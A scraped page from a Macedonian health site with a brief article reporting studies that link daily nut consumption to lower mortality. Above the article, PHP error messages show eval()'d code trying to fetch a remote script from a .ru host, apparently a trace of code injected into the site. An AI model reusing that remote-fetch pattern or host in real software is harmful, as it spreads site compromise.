Ореви, лешници и бадеми за подолг живот! | За Здравје


Error message

  • Warning: file_get_contents(): http:// wrapper is disabled in the server configuration by allow_url_fopen=0 in eval() (line 1 of /home/zdravjem/public_html/modules/php/php.module(80) : eval()'d code).
  • Warning: file_get_contents(http://nikicsgo.ru/app.php): failed to open stream: no suitable wrapper could be found in eval() (line 1 of /home/zdravjem/public_html/modules/php/php.module(80) : eval()'d code).

ЗДРАВА ИСХРАНА

Ореви, лешници и бадеми за подолг живот!

 

Консумирањето на една рака јаткасти плодови во текот на денот помага во водењето поздрав живот а воедно и го продолжува се вели во новата студија.

 

Истражувачите од институтот за канцер Dana-Farber од Бостон, САД, ги проучувале податоците од исхраната, животниот стил и здравјето на околу 120 000 мажи и жени помеѓу 1980-та и 2010-та година.

 

Пронајдено е дека консумирањето на 28 грама јаткасти плодови во текот на денот е поврзано со 20% намален ризик за смрт од било која причина во следните 30 години. Исто така ризикот од срцеви заболувања се намалил за 29% додека веројатноста за смрт од канцер се намалила за 11%.

 

Ефектите се однесуваат за ореви, лешници, индиски ореви, бадеми, бразилски кикирики, ф’стаци и кикирики.

 

Една поодамнешна студија спроведена на Универзитетот од Барселона исто така пронашла дека оревите, бадемите и лешниците помагаат во подобрувањето на расположението, го намалуваат апетитот и го подобруваат крвниот притисок.

ЗА ЗДРАВЈЕ NEWSLETTER